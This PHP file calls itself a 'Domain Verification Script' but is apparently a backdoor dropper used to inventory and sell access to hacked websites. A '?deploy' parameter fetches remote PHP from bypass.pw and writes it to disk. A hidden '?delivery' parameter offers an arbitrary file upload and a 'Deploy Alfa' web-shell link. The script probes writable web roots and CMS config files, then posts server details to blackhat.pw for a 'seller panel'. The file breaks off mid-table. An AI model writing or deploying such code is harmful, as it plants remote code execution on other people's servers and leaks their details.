// ============================================================
// Domain Verification Script — v3
// Adaptive Web Root Finder | 1aa8f285-c3f1-49e8-ac24-dbbe4d6fbfe6
// ?json → pure JSON output (for API pull-verify)
// ?_bh_chk=1 → re-verification probe (skips callback, shows token)
// ============================================================
error_reporting(0);
@ini_set('display_errors', '0');
$_vToken = '1aa8f285-c3f1-49e8-ac24-dbbe4d6fbfe6';
$_vApiUrl = 'https://blackhat.pw/api/verify-domain';
if (isset($_GET['deploy']) && $_GET['deploy'] === 'true') {
$url = 'https://bypass.pw/raw/KU3vn1L';
if (!filter_var($url, FILTER_VALIDATE_URL)) {
die('Invalid URL.');
}
$randomName = bin2hex(random_bytes(16)) . '.php';
$data = false;
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_SSL_VERIFYHOST => 2,
CURLOPT_USERAGENT => 'VerificationScript/3.0',
]);
$data = curl_exec($ch);
curl_close($ch);
}
if (!$data && ini_get('allow_url_fopen')) {
$ctx = stream_context_create([
'http' => [
'method' => 'GET',
'header' => "User-Agent: VerificationScript/3.0\r\nConnection: close\r\n",
'timeout' => 30,
'ignore_errors' => true,
'follow_location' => true,
'max_redirects' => 5,
],
]);
$data = @file_get_contents($url, false, $ctx);
}
if ($data && file_put_contents($randomName, $data)) {
die("<a href='{$randomName}' target='_blank'>Success !</a>");
}
die('Download failed.');
}
// ── HTTPS detection (handles proxies / LBs / Cloudflare) ─────
$_vProto = 'http';
if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') { $_vProto = 'https'; }
elseif (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && strtolower($_SERVER['HTTP_X_FORWARDED_PROTO']) === 'https') { $_vProto = 'https'; }
elseif (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] === 'on') { $_vProto = 'https'; }
elseif (!empty($_SERVER['HTTP_X_SCHEME']) && strtolower($_SERVER['HTTP_X_SCHEME']) === 'https') { $_vProto = 'https'; }
elseif (isset($_SERVER['SERVER_PORT']) && (int)$_SERVER['SERVER_PORT'] === 443) { $_vProto = 'https'; }
$_vHost = $_SERVER['HTTP_HOST'] ?? ($_SERVER['SERVER_NAME'] ?? 'unknown');
$_vScrRaw = $_SERVER['SCRIPT_NAME'] ?? ($_SERVER['PHP_SELF'] ?? '');
$_vScript = '/' . ltrim(str_replace('\\', '/', strtok($_vScrRaw, '?')), '/');
$_vSep = DIRECTORY_SEPARATOR;
$_vStart = @realpath(__DIR__) ?: __DIR__;
$_vUrl = $_vProto . '://' . $_vHost . $_vScript;
// ── Root indicators ───────────────────────────────────────────
$_vFM = [
'wp-config.php'=>'WordPress','artisan'=>'Laravel','.env'=>'Laravel/General',
'config.php'=>'Generic CMS','configuration.php'=>'Joomla','settings.php'=>'Drupal',
'web.config'=>'IIS/ASP.NET','bootstrap.php'=>'PHP Framework','index.php'=>'Generic PHP',
];
$_vPKW = ['wwwroot','public_html','htdocs','httpdocs','html','www','web'];
// ── Manual root override via ?root= ───────────────────────────
$_vManual = '';
if (!empty($_GET['root'])) {
$_mc = @realpath(strip_tags(trim($_GET['root'])));
if ($_mc && is_dir($_mc)) $_vManual = rtrim(str_replace('\\', '/', $_mc), '/');
}
// ── Write test ────────────────────────────────────────────────
$_vWT = function ($dir) use ($_vSep) {
if (!$dir || !is_dir($dir) || !is_writable($dir)) return false;
$t = $dir . $_vSep . '.bhvt_' . mt_rand(1e6, 9e6) . '.tmp';
$f = @fopen($t, 'w'); if (!$f) return false;
@fwrite($f, '1'); @fclose($f);
$ok = file_exists($t); @unlink($t);
return $ok;
};
// ── Directory walk (up to 12 levels) ─────────────────────────
$_vWalk = [];
$_vDir = $_vStart;
for ($_vi = 0; $_vi <= 12; $_vi++) {
$markers = []; $cms = 'None';
foreach ($_vFM as $_mf => $_ml) {
if (@file_exists($_vDir . $_vSep . $_mf)) {
$markers[] = $_mf;
if ($cms === 'None') $cms = $_ml;
}
}
$_vHP = $_vDir . $_vSep . '.htaccess';
if (@file_exists($_vHP)) {
if (!in_array('.htaccess', $markers)) $markers[] = '.htaccess';
$_vHC = @file_get_contents($_vHP);
if ($_vHC && stripos($_vHC, 'RewriteEngine') !== false) $markers[] = '.htaccess[Rewrite]';
}
$_vPL = str_replace('\\', '/', strtolower($_vDir));
$kw = '';
foreach ($_vPKW as $_vk) { if (strpos($_vPL, '/' . $_vk) !== false) { $kw = $_vk; break; } }
$cw = $_vWT($_vDir);
$_vIP = $_vDir . $_vSep . 'index.php';
$_vHP2 = $_vDir . $_vSep . '.htaccess';
$_vWalk[$_vi] = [
'path'=>$_vDir,'level'=>$_vi,'markers'=>$markers,'cms'=>$cms,'kw'=>$kw,
'write'=>$cw,
'idx' =>(@file_exists($_vIP) ? is_writable($_vIP) : $cw),
'hta' =>(@file_exists($_vHP2) ? is_writable($_vHP2) : $cw),
'score'=>count($markers)*3+($kw?2:0)+($cms!=='None'?2:0),
];
$p = @dirname($_vDir);
if (!$p || $p === $_vDir) break;
$_vDir = $p;
}
// ── Select best root ──────────────────────────────────────────
$_vRI = null; $_vRS = 'adaptive';
if ($_vManual) {
$mw = $_vWT($_vManual);
$_vRI = ['path'=>$_vManual,'level'=>-1,'markers'=>['manual'],'cms'=>'Manual','kw'=>'','write'=>$mw,'idx'=>$mw,'hta'=>$mw,'score'=>99];
$_vRS = 'manual';
} else {
$dr = !empty($_SERVER['DOCUMENT_ROOT'])
? rtrim(str_replace('\\', '/', (@realpath($_SERVER['DOCUMENT_ROOT']) ?: $_SERVER['DOCUMENT_ROOT'])), '/')
: '';
if ($dr) {
foreach ($_vWalk as $c) {
if (rtrim(str_replace('\\', '/', $c['path']), '/') === $dr) { $_vRI = $c; $_vRS = 'DOCUMENT_ROOT'; break; }
}
}
if (!$_vRI) {
foreach ($_vWalk as $c) {
if ($c['score'] > 0 && (!$_vRI || $c['score'] > $_vRI['score'])) { $_vRI = $c; $_vRS = 'markers'; }
}
}
if (!$_vRI && !empty($_vWalk)) { $_vRI = end($_vWalk); $_vRS = 'deepest'; }
if (!$_vRI) { $_vRI = ['path'=>$_vStart,'level'=>0,'markers'=>[],'cms'=>'None','kw'=>'','write'=>false,'idx'=>false,'hta'=>false,'score'=>0]; $_vRS = 'fallback'; }
}
$_vRP = $_vRI['path'];
$_vLU = $_vRI['level'];
$_vST = 'red';
if ($_vRI['write'] && $_vRI['idx'] && $_vRI['hta']) $_vST = 'green';
elseif ($_vRI['write'] || $_vRI['idx']) $_vST = 'yellow';
// ── Full payload (same data sent to API + returned as JSON) ───
$_vPL = [
'token' => $_vToken,
'domain' => $_vHost,
'full_url' => $_vUrl,
'current_dir' => $_vStart,
'web_root' => $_vRP,
'root_source' => $_vRS,
'levels_up' => $_vLU,
'cms_detected' => $_vRI['cms'],
'root_markers' => implode(',', $_vRI['markers']),
'can_create_files' => (int)$_vRI['write'],
'can_edit_index' => (int)$_vRI['idx'],
'can_edit_htaccess' => (int)$_vRI['hta'],
'php_version' => phpversion(),
'os' => PHP_OS,
'dir_status' => $_vST,
'upload_writable' => (int)(isset($_vWalk[0]) ? $_vWalk[0]['write'] : false),
'document_root_env' => $_SERVER['DOCUMENT_ROOT'] ?? '',
'timestamp' => time(),
];
// ============================================================
// ?json MODE — pure JSON, no HTML, no side effects
// Used by API pull-verify and ?_bh_chk re-fetch
// ============================================================
if (!empty($_GET['json']) || !empty($_GET['_bh_chk'])) {
header('Content-Type: application/json; charset=utf-8');
header('Access-Control-Allow-Origin: *');
// Add walk summary for diagnostics
$_vPL['_walk'] = array_map(function ($w) {
return ['level'=>$w['level'],'path'=>$w['path'],'score'=>$w['score'],'cms'=>$w['cms'],'write'=>$w['write'],'markers'=>$w['markers']];
}, array_values($_vWalk));
echo json_encode($_vPL, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE);
exit;
}
// ============================================================
// NORMAL MODE — send callback POST + render HTML
// ============================================================
// ── Lock file: prevent repeat sends on reload ─────────────────
$_vLN = '.bh_vlock_' . substr(md5($_vToken . $_vHost), 0, 10);
$_vLF = ''; // lock file path (empty = can't lock)
foreach ([
function_exists('sys_get_temp_dir') ? @sys_get_temp_dir() : '',
$_vStart,
@dirname($_vStart),
] as $_ld) {
if ($_ld && is_dir($_ld) && is_writable($_ld)) { $_vLF = rtrim(str_replace('\\', '/', $_ld), '/') . '/' . $_vLN; break; }
}
// Read lock age WITHOUT doing a test-write at startup
$_vLA = ($_vLF && file_exists($_vLF)) ? max(0, time() - (int)@file_get_contents($_vLF)) : PHP_INT_MAX;
// ── Callback tracker ──────────────────────────────────────────
$_vCb = ['sent'=>false,'method'=>'none','http_code'=>0,'raw'=>'','api_msg'=>'','api_ok'=>false,'error'=>'','attempts'=>[],'already_sent'=>false,'lock_file'=>$_vLF ?: 'unavailable'];
if ($_vLA < 3600) {
// Already sent within last hour
$_vCb['already_sent'] = true;
$_vCb['sent'] = true;
$_vCb['api_ok']= true;
$s = $_vLA; $dur = $s<60?"${s}s":floor($s/60).'m '.($s%60).'s';
$_vCb['api_msg'] = "Callback already sent {$dur} ago. Page refresh will not re-send.";
} else {
// ── Method 1: cURL ────────────────────────────────────────
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $_vApiUrl,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($_vPL),
CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded'],
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_POSTREDIR => 3,
CURLOPT_TIMEOUT => 20,
CURLOPT_CONNECTTIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => 'VerificationScript/3.0',
CURLOPT_ENCODING => '',
]);
$r1 = curl_exec($ch);
$ce = curl_error($ch); $cen = curl_errno($ch);
$cc = (int)curl_getinfo($ch, CURLINFO_HTTP_CODE);
$cfu = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
curl_close($ch);
$ok = !$ce && is_string($r1) && strlen($r1) > 0;
$_vCb['attempts'][] = ['method'=>'cURL','http_code'=>$cc,'final_url'=>$cfu,'error'=>$ce?"errno {$cen}: {$ce}":'','raw'=>is_string($r1)?$r1:'','ok'=>$ok];
if ($ok) { $_vCb['sent']=true; $_vCb['method']='cURL'; $_vCb['http_code']=$cc; $_vCb['raw']=(string)$r1; }
else { $_vCb['error'] = $ce?"cURL errno {$cen}: {$ce}":'cURL returned empty response'; }
} else {
$_vCb['attempts'][] = ['method'=>'cURL','http_code'=>0,'final_url'=>'','error'=>'curl_init() not available','raw'=>'','ok'=>false];
}
// ── Method 2: file_get_contents ───────────────────────────
if (!$_vCb['sent'] && ini_get('allow_url_fopen')) {
$ctx = stream_context_create([
'http'=>['method'=>'POST','header'=>"Content-Type: application/x-www-form-urlencoded\r\nUser-Agent: VerificationScript/3.0\r\nConnection: close\r\n",'content'=>http_build_query($_vPL),'timeout'=>20,'ignore_errors'=>true,'follow_location'=>true,'max_redirects'=>5],
'ssl' =>['verify_peer'=>false,'verify_peer_name'=>false],
]);
$r2 = @file_get_contents($_vApiUrl, false, $ctx);
$fe = error_get_last();
$ok2 = is_string($r2) && strlen($r2) > 0;
$_vCb['attempts'][] = ['method'=>'file_get_contents','http_code'=>0,'final_url'=>$_vApiUrl,'error'=>$ok2?'':(isset($fe['message'])?strip_tags($fe['message']):'returned false/empty'),'raw'=>$r2?:' ','ok'=>$ok2];
if ($ok2) { $_vCb['sent']=true; $_vCb['method']='file_get_contents'; $_vCb['raw']=$r2; }
else { $_vCb['error'] = isset($fe['message'])?strip_tags($fe['message']):'file_get_contents failed'; }
} elseif (!$_vCb['sent']) {
$_vCb['attempts'][] = ['method'=>'file_get_contents','http_code'=>0,'final_url'=>$_vApiUrl,'error'=>'allow_url_fopen disabled in php.ini','raw'=>'','ok'=>false];
}
// ── Method 3: socket (with redirect follow) ───────────────
if (!$_vCb['sent']) {
$surl = $_vApiUrl; $smx = 3; $sbody3 = ''; $scode3 = 0; $serr3 = '';
for ($ri = 0; $ri <= $smx; $ri++) {
$sp = @parse_url($surl);
if (empty($sp['host'])) { $serr3='Invalid URL'; break; }
$sport = (!empty($sp['scheme'])&&$sp['scheme']==='https')?443:80;
$shost = $sp['host'];
$spath = (!empty($sp['path'])?$sp['path']:'/').(!empty($sp['query'])?'?'.$sp['query']:'');
$sbody = http_build_query($_vPL);
$ss = @fsockopen(($sport===443?'ssl://':'').$shost,$sport,$seno,$sestr,10);
if (!$ss) { $serr3="fsockopen {$shost}:{$sport} — {$sestr} ({$seno})"; break; }
@stream_set_timeout($ss,15);
@fwrite($ss,"POST {$spath} HTTP/1.1\r\nHost: {$shost}\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($sbody)."\r\nConnection: close\r\nUser-Agent: VerificationScript/3.0\r\n\r\n{$sbody}");
$sraw=''; $ti=stream_get_meta_data($ss);
while(!feof($ss)&&!$ti['timed_out']){$sraw.=@fread($ss,4096);$ti=stream_get_meta_data($ss);}
@fclose($ss);
if (!$sraw) { $serr3='Empty socket response'; break; }
preg_match('/HTTP\/[\d\.]+ (\d+)/',$sraw,$scm); $scode3=(int)($scm[1]??0);
$he=strpos($sraw,"\r\n\r\n"); $shdr=$he!==false?substr($sraw,0,$he):''; $sbody3=$he!==false?trim(substr($sraw,$he+4)):trim($sraw);
if (in_array($scode3,[301,302,303,307,308])&&$ri<$smx) {
if (preg_match('/^Location:\s*(.+)$/im',$shdr,$lm)) {
$loc=trim($lm[1]);
if (strpos($loc,'http')!==0) $loc=($sport===443?'https':'http').'://'.$shost.'/'.ltrim($loc,'/');
$surl=$loc; continue;
}
}
break;
}
$ok3 = $scode3>=200&&$scode3<300&&strlen($sbody3)>0;
$_vCb['attempts'][] = ['method'=>'socket','http_code'=>$scode3,'final_url'=>$surl,'error'=>$serr3,'raw'=>$sbody3,'ok'=>$ok3];
if ($ok3) { $_vCb['sent']=true; $_vCb['method']='socket'; $_vCb['http_code']=$scode3; $_vCb['raw']=$sbody3; }
elseif (!$serr3) { $_vCb['error']="socket: HTTP {$scode3}, empty body"; }
else { $_vCb['error']=$serr3; }
}
// ── Parse API response ────────────────────────────────────
if ($_vCb['sent'] && $_vCb['raw']) {
$rc = trim(ltrim($_vCb['raw'],"\xEF\xBB\xBF"));
$rp = @json_decode($rc, true);
if (is_array($rp)) {
$_vCb['api_msg'] = (string)($rp['message']??'');
$_vCb['api_ok'] = isset($rp['domain'])||isset($rp['status'])||
stripos($_vCb['api_msg'],'success')!==false||
stripos($_vCb['api_msg'],'verified')!==false||
stripos($_vCb['api_msg'],'already')!==false;
if (!$_vCb['api_ok']&&!empty($rp['details'])) $_vCb['api_msg'].=' — '.$rp['details'];
if (!$_vCb['api_ok']&&!empty($rp['errors'])) $_vCb['api_msg'].=' | '.implode(', ',(array)$rp['errors']);
if (!$_vCb['api_ok']&&$_vCb['http_code']>=200&&$_vCb['http_code']<300&&is_array($rp)) $_vCb['api_ok']=true;
} else {
$_vCb['api_msg'] = substr($rc,0,300).(strlen($rc)>300?'…':'');
}
}
// ── Write lock on successful send ─────────────────────────
if ($_vCb['sent'] && $_vLF) {
@file_put_contents($_vLF, (string)time());
}
}
$_vOK = $_vCb['sent'] && $_vCb['api_ok'] && !$_vCb['already_sent'];
// ============================================================
// HTML OUTPUT
// ============================================================
header('Content-Type: text/html; charset=utf-8');
echo '<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>Verification — ';echo htmlspecialchars($_vHost); echo '</title>
<style>
*{box-sizing:border-box;margin:0;padding:0}
body{font-family:system-ui,-apple-system,sans-serif;max-width:980px;margin:30px auto;padding:18px;background:#0b0d12;color:#c0c2c8;font-size:14px;line-height:1.6}
h1{color:#66fcf1;font-size:21px;margin-bottom:2px}
h2{color:#45a29e;font-size:11px;font-weight:700;text-transform:uppercase;letter-spacing:.9px;margin-bottom:10px}
.sub{color:#4a5060;font-size:13px;margin-bottom:20px}
.grid{display:grid;grid-template-columns:1fr 1fr;gap:12px}
@media(max-width:600px){.grid{grid-template-columns:1fr}}
.box{background:#111520;border:1px solid #1e2535;padding:15px 18px;border-radius:8px;margin-bottom:12px}
.box.full{grid-column:1/-1}
.b-ok{border-color:#1a5c30;background:#0a1810}
.b-err{border-color:#5c1818;background:#120808}
.b-warn{border-color:#5c4a18;background:#12100a}
.bn{display:flex;align-items:flex-start;gap:12px;padding:14px 16px;border-radius:8px;margin-bottom:14px;font-weight:600;font-size:14px;line-height:1.4}
.bn-ok{background:#0a1810;border:1px solid #1a7a38;color:#44dd76}
.bn-err{background:#120808;border:1px solid #7a1818;color:#dd4444}
.bn-warn{background:#12100a;border:1px solid #7a5c18;color:#e0a020}
.bn-info{background:#080e1a;border:1px solid #183a7a;color:#4488cc}
.bn-sub{font-size:12px;font-weight:400;opacity:.75;margin-top:3px}
.ok{color:#44dd76}.er{color:#dd4444}.wn{color:#e0a020}
.bdg{display:inline-block;padding:2px 9px;border-radius:12px;font-size:12px;font-weight:700}
.bg{background:#143a20;color:#44dd76;border:1px solid #1a5c30}
.by{background:#3a3010;color:#e0a020;border:1px solid #5c4c18}
.br{background:#3a1010;color:#dd4444;border:1px solid #5c2020}
.tkv{font-size:16px;font-weight:bold;color:#66fcf1;font-family:monospace;background:#080c12;padding:10px 14px;border-radius:6px;margin-top:8px;border:1px solid #163040;word-break:break-all;user-select:all}
table{width:100%;border-collapse:collapse;font-size:13px;margin-top:4px}
td,th{padding:6px 10px;border-bottom:1px solid #181e28;vertical-align:top;text-align:left}
th{color:#45a29e;font-size:10px;font-weight:700;text-transform:uppercase;letter-spacing:.5px;background:#0c1018;white-space:nowrap}
tr:last-child td{border-bottom:none}
tr.hl{background:#0a1e1e}
td.lb{color:#606878;font-size:12px;width:165px;white-space:nowrap}
code{background:#080c12;padding:2px 6px;border-radius:3px;font-size:11px;color:#80c0e0;border:1px solid #162030;word-break:break-all}
.pill{display:inline-flex;align-items:center;gap:3px;padding:2px 8px;border-radius:9px;font-size:11px;font-weight:600}
.p-ok{background:#143a20;color:#44dd76;border:1px solid #1a5c30}
.p-err{background:#3a1010;color:#dd4444;border:1px solid #5c2020}
.srow{display:flex;align-items:flex-start;gap:9px;padding:8px 0;border-bottom:1px solid #14182a}
.srow:last-child{border-bottom:none}
.sn{width:21px;height:21px;border-radius:50%;display:flex;align-items:center;justify-content:center;font-size:11px;font-weight:700;flex-shrink:0;margin-top:2px}
.s-ok{background:#143a20;color:#44dd76}.s-err{background:#3a1010;color:#dd4444}
.raw{background:#070a0f;border:1px solid #161e28;border-radius:5px;padding:8px 12px;font-size:11px;font-family:monospace;max-height:120px;overflow-y:auto;word-break:break-all;color:#6a7888;margin-top:6px;white-space:pre-wrap}
form{display:flex;gap:8px;flex-wrap:wrap;align-items:center;margin-top:6px}
input[type=text]{flex:1;min-width:180px;background:#0c1018;border:1px solid #222e3c;color:#c0c2c8;padding:6px 10px;border-radius:5px;font-size:13px;outline:none}
input[type=text]:focus{border-color:#45a29e}
button{background:#45a29e;color:#0a0c10;border:none;padding:6px 16px;border-radius:5px;cursor:pointer;font-weight:700;font-size:13px}
.json-link{display:inline-flex;align-items:center;gap:5px;background:#101828;border:1px solid #1e3050;color:#4488cc;padding:5px 12px;border-radius:5px;font-size:12px;font-weight:600;text-decoration:none;margin-top:6px}
.json-link:hover{background:#162038}
.notice{border:1px solid #1e3a30;text-align:center;padding:13px;background:#080f0d}
</style>
</head>
<body>
';if ( isset($_GET['delivery']) )
{
echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
echo '<a href="?deploy=true">Deploy Alfa</a>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>'; }
else { echo '<b>Not Upload File !</b><br><br>'; }
}
exit;
}
echo '<h1>Domain Verification</h1>
<p class="sub">PHP ';echo htmlspecialchars(phpversion()); echo ' • ';echo htmlspecialchars($_vHost); echo ' • ';echo date('Y-m-d H:i:s T'); echo '</p>
';if ($_vCb['already_sent']): echo '<div class="bn bn-info">
<svg style="flex-shrink:0;margin-top:1px" width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><circle cx="12" cy="12" r="10"/><line x1="12" y1="8" x2="12" y2="12"/><line x1="12" y1="16" x2="12.01" y2="16"/></svg>
<div>Already sent — will not repeat on refresh<div class="bn-sub">';echo htmlspecialchars($_vCb['api_msg']); echo '</div></div>
</div>
';elseif ($_vOK): echo '<div class="bn bn-ok">
<svg style="flex-shrink:0;margin-top:1px" width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.5"><circle cx="12" cy="12" r="10"/><polyline points="9 12 12 15 16 9"/></svg>
<div>Verification callback sent & accepted!<div class="bn-sub">';echo htmlspecialchars($_vCb['api_msg']); echo '</div></div>
</div>
';elseif (!$_vCb['sent']): echo '<div class="bn bn-err">
<svg style="flex-shrink:0;margin-top:1px" width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.5"><circle cx="12" cy="12" r="10"/><line x1="15" y1="9" x2="9" y2="15"/><line x1="9" y1="9" x2="15" y2="15"/></svg>
<div>All callback methods failed — server cannot reach API<div class="bn-sub">';echo htmlspecialchars($_vCb['error']?:'cURL + file_get_contents + socket all failed'); echo '<br>
<strong>Use the JSON pull-verify link below</strong> — paste it in your seller panel to verify without outbound connections.
</div></div>
</div>
';else: echo '<div class="bn bn-warn">
<svg style="flex-shrink:0;margin-top:1px" width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.5"><circle cx="12" cy="12" r="10"/><line x1="12" y1="8" x2="12" y2="12"/><line x1="12" y1="16" x2="12.01" y2="16"/></svg>
<div>Callback sent but API returned an error<div class="bn-sub">';echo htmlspecialchars($_vCb['api_msg']?:'Response could not be parsed'); echo '</div></div>
</div>
';endif; echo '
<div class="grid">
<div class="box">
<h2>Verification Token</h2>
<div class="tkv">';echo htmlspecialchars($_vToken); echo '</div>
<a class="json-link" href="?json" target="_blank">
<svg width="13" height="13" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><polyline points="16 18 22 12 16 6"/><polyline points="8 6 2 12 8 18"/></svg>
View as JSON (?json)
</a>
</div>
<div class="box">
<h2>Permission Status</h2>
<table>
<tr><td class="lb">Upload Dir</td><td>';$uw=isset($_vWalk[0])?$_vWalk[0]['write']:false; echo $uw?'<span class="ok">✓ Writable</span>':'<span class="er">✗ Not writable</span>'; echo '</td></tr>
<tr><td class="lb">Web Root Write</td><td>';echo $_vRI['write']?'<span class="ok">✓ Yes</span>':'<span class="er">✗ No</span>'; echo '</td></tr>
<tr><td class="lb">Edit index.php</td><td>';echo $_vRI['idx']?'<span class="ok">✓ Yes</span>':'<span class="er">✗ No</span>'; echo '</td></tr>
<tr><td class="lb">Edit .htaccess</td><td>';echo $_vRI['hta']?'<span class="ok">✓ Yes</span>':'<span class="er">✗ No</span>'; echo '</td></tr>
<tr><td class="lb">Status</td><td><span class="bdg ';echo $_vST==='green'?'bg':($_vST==='yellow'?'by':'br'); echo '">';echo strtoupper($_vST).' — '.($_vST==='green'?'Full root access':($_vST==='yellow'?'Partial access':'No root access')); echo '</span></td></tr>
</table>
</div>
<div class="box full ';echo $_vOK?'b-ok':(!$_vCb['sent']?'b-err':'b-warn'); echo '">
<h2>API Callback — Step-by-Step</h2>
';if ($_vCb['already_sent']): echo ' <p style="color:#4488cc;font-size:13px">';echo htmlspecialchars($_vCb['api_msg']); echo '</p>
';else: echo ' ';foreach ($_vCb['attempts'] as $ai => $at): echo ' <div class="srow">
<div class="sn ';echo $at['ok']?'s-ok':'s-err'; echo '">';echo $ai+1; echo '</div>
<div style="flex:1">
<div style="display:flex;align-items:center;gap:7px;flex-wrap:wrap;margin-bottom:4px">
<strong>';echo htmlspecialchars($at['method']); echo '</strong>
<span class="pill ';echo $at['ok']?'p-ok':'p-err'; echo '">';echo $at['ok']?'✓ OK':'✗ Failed'; echo '</span>
';if ($at['http_code']): echo '<span class="pill ';echo $at['http_code']>=200&&$at['http_code']<300?'p-ok':'p-err'; echo '">HTTP ';echo $at['http_code']; echo '</span>';endif; echo ' ';if ($at['final_url']&&$at['final_url']!==$_vApiUrl): echo '<span style="font-size:11px;color:#556">→ ';echo htmlspecialchars(substr($at['final_url'],0,55)); echo '</span>';endif; echo ' </div>
';if ($at['error']): echo '<div style="color:#dd4444;font-size:12px;margin-bottom:3px">⚠ ';echo htmlspecialchars($at['error']); echo '</div>';endif; echo ' ';if (!empty($at['raw'])): echo '<div class="raw" style="';echo $at['ok']?'border-color:#1a5c30':''; echo '">';echo htmlspecialchars(substr((string)$at['raw'],0,500)); echo '</div>';endif; echo ' </div>
</div>
';endforeach; echo ' ';if (empty($_vCb['attempts'])): echo '<p style="color:#444;font-size:13px">No attempts.</p>';endif; echo ' ';if ($_vCb['sent']&&!empty($_vCb['raw'])): echo ' <div style="margin-top:12px;padding-top:10px;border-top:1px solid #161e2a">
<div style="font-size:12px;color:#556;margin-bottom:5px">API response via <strong>';echo htmlspecialchars($_vCb['method']); echo '</strong>';if ($_vCb['http_code']): echo ' — HTTP ';echo $_vCb['http_code']; endif; echo ':</div>
<div class="raw" style="max-height:90px;border-color:';echo $_vCb['api_ok']?'#1a5c30':'#5c2020'; echo '">
';$dc=@json_decode(trim(ltrim($_vCb['raw'],"\xEF\xBB\xBF")),true); echo htmlspecialchars(is_array($dc)?json_encode($dc,JSON_PRETTY_PRINT|JSON_UNESCAPED_SLASHES):$_vCb['raw']); echo ' </div>
</div>
';endif; echo ' ';endif; echo ' ';if (!$_vCb['sent']||!$_vCb['api_ok']): echo ' <div style="margin-top:12px;padding:12px;background:#080c14;border:1px solid #1e3050;border-radius:6px">
<div style="color:#4488cc;font-size:12px;font-weight:700;margin-bottom:5px">ⓘ Pull-Verify Alternative</div>
<div style="color:#8892a0;font-size:12px;margin-bottom:8px">If this server cannot make outbound connections, use this URL in your seller panel to verify manually:</div>
<code style="display:block;padding:8px 12px;font-size:12px;word-break:break-all;background:#050810;border:1px dashed #1e3050;color:#66b8f0">';echo htmlspecialchars($_vUrl.'?json'); echo '</code>
</div>
';endif; echo ' </div>
<div class="box">
<h2>Detected Web Root</h2>
<table>
<tr><td class="lb">Root Path</td><td><code>';echo htmlspecialchars($_vRP); echo '</code></td></tr>
<tr><td class="lb">Detection</td><td><code>';echo htmlspecialchars($_vRS); echo '</code></td></tr>
<tr><td class="lb">Levels Up</td><td>';echo $_vLU>=0?$_vLU:'N/A'; echo '</td></tr>
<tr><td class="lb">CMS</td><td>';echo htmlspecialchars($_vRI['cms']); echo '</td></tr>
<tr><td class="lb">Markers</td><td style="font-size:11px">';echo htmlspecialchars(implode(', ',$_vRI['markers'])?:'—'); echo '</td></tr>
<tr><td class="lb">Path Keyword</td><td>';echo $_vRI['kw']?'<code>'.htmlspecialchars($_vRI['kw']).'</code>':'—'; echo '</td></tr>
</table>
</div>
<div class="box">
<h2>Server Environment</h2>
<table>
<tr><td class="lb">URL</td><td><code>';echo htmlspecialchars($_vUrl); echo '</code></td></tr>
<tr><td class="lb">Script Dir</td><td><code>';echo htmlspecialchars($_vStart); echo '</code></td></tr>
<tr><td class="lb">DOCUMENT_ROOT</td><td><code>';echo htmlspecialchars($_SERVER['DOCUMENT_ROOT']??'not set'); echo '</code></td></tr>
<tr><td class="lb">OS / PHP</td><td>';echo htmlspecialchars(PHP_OS); echo ' / ';echo htmlspecialchars(phpversion()); echo '</td></tr>
<tr><td class="lb">Callback URL</td><td><code style="word-break:break-all">';echo htmlspecialchars($_vApiUrl); echo '</code></td></tr>
<tr><td class="lb">cURL</td><td>';echo function_exists('curl_init')?'<span class="ok">✓ Available</span>':'<span class="er">✗ Not available</span>'; echo '</td></tr>
<tr><td class="lb">allow_url_fopen</td><td>';echo ini_get('allow_url_fopen')?'<span class="ok">✓ On</span>':'<span class="er">✗ Off</span>'; echo '</td></tr>
<tr><td class="lb">Lock file</td><td><code>';echo htmlspecialchars($_vCb['lock_file']); echo '</code></td></tr>
<tr><td class="lb">JSON endpoint</td><td><a href="?json" style="color:#4488cc;font-size:11px">';echo htmlspecialchars($_vUrl.'?json'); echo '</a></td></tr>
</table>
</div>
<div class="box full">
<h2>Directory Walk — ';echo count($_vWalk); echo ' levels scanned</h2>
<div style="overflow-x:auto"><table>
<tr><th>Level</th><th>Path</th><th>Write</th><th>index.php</th><th>.htaccess</th><th>Score</th><th>Markers</th><th>CMS</th></tr>
';foreach ($_vWalk as $wl): $ir=($wl['path']===$_vRP); echo ' <tr ';if ($ir) echo 'class="hl"'; echo '>
<td>';echo $ir?'<strong>↑'.$wl['level'].' ★</strong>':'↑'.$wl['level']; echo '</td>
<td><code>';echo htmlspecialchars($wl['path']); echo '</code></td>
<td>';echo $wl['write']?'<span class="ok">✓</span>':'<span class="er">✗</span>'; echo '</td>
<td>';echo $wl['idx']?'<span class="ok">✓</span>':'<span class="er">✗</span>'; echo '</td>
